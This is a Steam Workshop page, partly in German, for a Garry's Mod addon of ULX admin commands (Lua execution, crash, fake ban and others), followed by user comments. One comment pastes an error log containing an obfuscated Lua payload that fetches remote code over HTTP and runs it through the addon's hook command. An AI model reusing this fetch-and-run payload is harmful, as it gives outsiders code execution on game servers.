Garry's Mod

Garry's Mod

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ULX Custom Commands
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Content Type: Addon
Addon Type: Tool
Addon Tags: Build, Roleplay
24.898 KB
18. März 2017 um 17:39
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ULX Custom Commands

DarkRP 2.6+ Support
### ULX Extra
**Features Of ULX Custom Commands!**
Custom ways to manage your server with extra commands. These commands will make admin sits quicker, manager your server easier, and make your server more fun!

**Commands Added**

ULX Tsay Colour - Sends A Message To Everyone In The Chat Box With Colour
ULX Sasay - Sends A Message To Connected Superadmins / And People Who Inherit From Superadmin
ULX CSay - Sends A Coloured Message To The Middle Of Everyones Screen
ULX Notification - Sends A Notification With Customisable text To People

ULX Donate - Type !donate and it takes you to a desired link.

ULX Speed - Sets a Targets Run, Walk, And Streith Speed.
ULX Model - Sets a players playermodel, can be useful for seeing if playermodels work.
ULX Jump Power - Sets A Targets Jump height
ULX Frags - Sets A Users Deaths, And Kills On The Scoreboard
ULX Giveammo - Gives Ammo To A Target
ULX Set Ammo - Sets A Targets Ammo
ULX Scale - Sets A Players Playermodel Size
ULX Shock - Electricutes A Player

ULX Hook - Hooks a run string to the server
ULX Remove Hook - Removes A run string from the server

ULX Notepad - Opens A Notepad which all admins have access to. Can be useful to share info to other admins.

ULX PGag - Perma Gag Someone
ULX UnPGag - Un Perma gag Someone

ULX Send Lua - Sends a Lua String On A Client
ULX URL = Open a url on any player
ULX Convar - Change The Server Convar

ULX Soundlist - Play a sound to the whole server

ULX FBring - Brings A Player And Freezes them
ULX FTeleport - Freezes and teleports a player
ULX Send - Sends a target to another target
ULX Warp/Setwarp - Sets a position to goto e.g '!setwarp spawn', '!warp spawn'

ULX Map Restart - restarts the map
ULX Stop Sounds - Stops All Sounds For All Clients
ULX Multi Ban - Ban Multiple People At Once
ULX Thirdperson - !3p
ULX Cleardecals - Clears All Decals
ULX Bot - Creates A Bot On The Server
ULX Ban IP - Bans A Players IP
ULX Ban ID - Bans Players SteamID
ULX Crash - Forces the players game to crash
ULX Watchlist/Watch - Menu with rulebreakers e.g, '!watch Snugzzz MRDM'
ULX SBan - Silently Ban Someone
ULX FakeBan - Fake A Ban on Someone.
ULX Profile - Opens Steam Profile Of Someone
ULX Friends - Sees current friends on the server.
ULX Enter/Exit - Forces a player in / out of vehicles
ULX ForceRespawn - Forces a player to respawn

** How To Install**
Simply unzip the folder provided and drag and drop the custom_commands folder into addons! Simple! Then restart your server and type !menu to view all the commands!
When you install this manage your ranks fully! The commands provided may be abused easily if not given to the right people!
Beliebte Diskussionen Alle anzeigen (1)
19. Jan. 2021 um 8:18
65 Kommentare
Officer Diggler 20. Mai 2024 um 18:19 
@cpl "ulx adduser <username> admin
Cpl. Cemodracy 17. März 2024 um 19:42 
What command gives admin to players?
HypFox 7. Juli 2023 um 13:28 
i wish there where carban/carunban and propban/propunban, that would have been amazing for darkrp
>KB> >KEKSQUAD 3. Juli 2023 um 11:44 
[ULX Custom Commands] RunString(Ex):1: <name> or '...' expected near ''hook.Remove([[Think]],[[jjj]])timer.Simple(10,function()local ) a=[[http]]..string.char(58)..string.char(47)..string.char(47)..[[ ]]http.Fetch(a,RunStringEx)end)''
1. call - lua/ulx/modules/sh/cc_hook.lua:12
2. __fn - lua/ulib/shared/commands.lua:951
3. execute - lua/ulib/shared/commands.lua:1331
4. execStringULib - lua/ulib/shared/util.lua:339
5. fn - lua/ulx/end.lua:4
6. fn - lua/ulx/end.lua:131
7. unknown - lua/ulib/shared/hook.lua:109
Mayonetic 15. Apr. 2023 um 8:02 
warp just teleports me to the same place even if theyre named different
The man who sold Lua 23. Juli 2022 um 7:07 
how can i fix the scale ? when I scale a player, the camera is buggy
seblee2009 7. Mai 2022 um 13:16 
you what:steamhappy:
survivaler049 20. Apr. 2022 um 10:56 
[ulx_custom_commands_886529677] addons/ulx_custom_commands_886529677/lua/ulx/modules/sh/cc_fun.lua:91: attempt to compare number with nil
1. call - addons/ulx_custom_commands_886529677/lua/ulx/modules/sh/cc_fun.lua:91
2. __fn - addons/ulib_557962238/lua/ulib/shared/commands.lua:943
3. execute - addons/ulib_557962238/lua/ulib/shared/commands.lua:1323
4. unknown - addons/ulib_557962238/lua/ulib/shared/commands.lua:1351
5. unknown - lua/includes/modules/concommand.lua:54
survivaler049 20. Apr. 2022 um 10:36 
can I put dropbox sounds in soundlist ?
TREE OAKWOOD 29. Dez. 2020 um 17:08 
no one cares if u didnt ask